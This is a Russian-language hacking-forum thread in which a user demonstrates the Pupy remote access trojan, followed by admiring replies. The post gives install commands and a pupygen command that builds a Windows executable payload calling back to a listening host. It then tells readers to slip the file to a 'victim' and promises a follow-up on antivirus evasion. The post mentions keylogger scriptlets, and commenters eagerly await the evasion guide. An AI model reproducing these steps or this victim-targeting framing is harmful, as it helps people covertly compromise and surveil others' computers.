PUPY Remote Administration Tool (RAT)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 15 ноя 2016.

Наш партнер Genesis Hackspace
  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    428
    Симпатии:
    1.380
    Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

    Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
    Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

    После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.

    Я считаю что его можно отлично использовать для:
    • security research
    • обучения
    • пентестинга
    • администрирования
    И так давайте все же познакомимся с ним по ближе.
    Создаем PAYLOAD
    Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux):
    Код (Text):
    git clone https://github.com/n1nj4sec/pupy.git pupy
    cd pupy
    git submodule update --init --depth 1 pupy/payload_templates
    git submodule init
    git submodule update
    pip install -r requirements.txt

    Дальше идем в папку pupy и там нас пока что интересуют только два файла:
    pupygen.py -сам билдер(генератор) так сказать и pupysh.py сама серверная часть,консоль управления.
    PUPY Remote Administration Tool (RAT)

    Я попытаюсь кратко описать функционал,иначе статья будет очень длинная. Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой
    Код (Text):
     python pupygen.py -l
    PUPY Remote Administration Tool (RAT)
    Cгенерировать бинарник под виндоус систему можно следующей командой:
    Код (Text):
    ./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443
     
    PUPY Remote Administration Tool (RAT)
    После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть)

    Дальше все очень похоже на метерпретер сессию метаслоита:
    Открываем сессию командой
    Код (Text):
    session -i 1
    пользуемся командамы
    help
    list_modules
    run module_name -h

    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)
    PUPY Remote Administration Tool (RAT)

    Спасибо за внимания.C Вами был DarkNode)
     
    hdmoor, i_bog_i, msfconsole и 3 другим нравится это.
  2. gURaBA_N

    gURaBA_N Member
    Paid Access

    Регистрация:
    5 ноя 2016
    Сообщения:
    13
    Симпатии:
    3
    ого. классная статья. Понятно все расписанно. Жду тему об обходе антивирей
     
    WebWare Team нравится это.
  3. xXx

    xXx Member

    Регистрация:
    20 сен 2016
    Сообщения:
    6
    Симпатии:
    3
    Зачет! Понравился результат под системой )))
     
  4. koldonuuchu

    koldonuuchu Active Member
    Grey Team

    Регистрация:
    4 ноя 2016
    Сообщения:
    37
    Симпатии:
    41
  5. mr RipMars

    mr RipMars New Member

    Регистрация:
    24 июл 2016
    Сообщения:
    1
    Симпатии:
    0
    Отлично! Побольше бы таких подробных описаний )
     
  6. m0tion

    m0tion Member

    Регистрация:
    2 окт 2016
    Сообщения:
    16
    Симпатии:
    10
    Мощная вещь. С нетерпетием жду обход АВ.
     
    i_bog_i нравится это.
Загрузка...
Похожие Темы - PUPY Remote Administration
  1. Petrosoft
    Ответов:
    0
    Просмотров:
    69
  2. Petrosoft
    Ответов:
    0
    Просмотров:
    44
  3. Petrosoft
    Ответов:
    0
    Просмотров:
    40
  4. Petrosoft
    Ответов:
    0
    Просмотров:
    33
  5. Aspose
    Ответов:
    0
    Просмотров:
    56

Поделиться этой страницей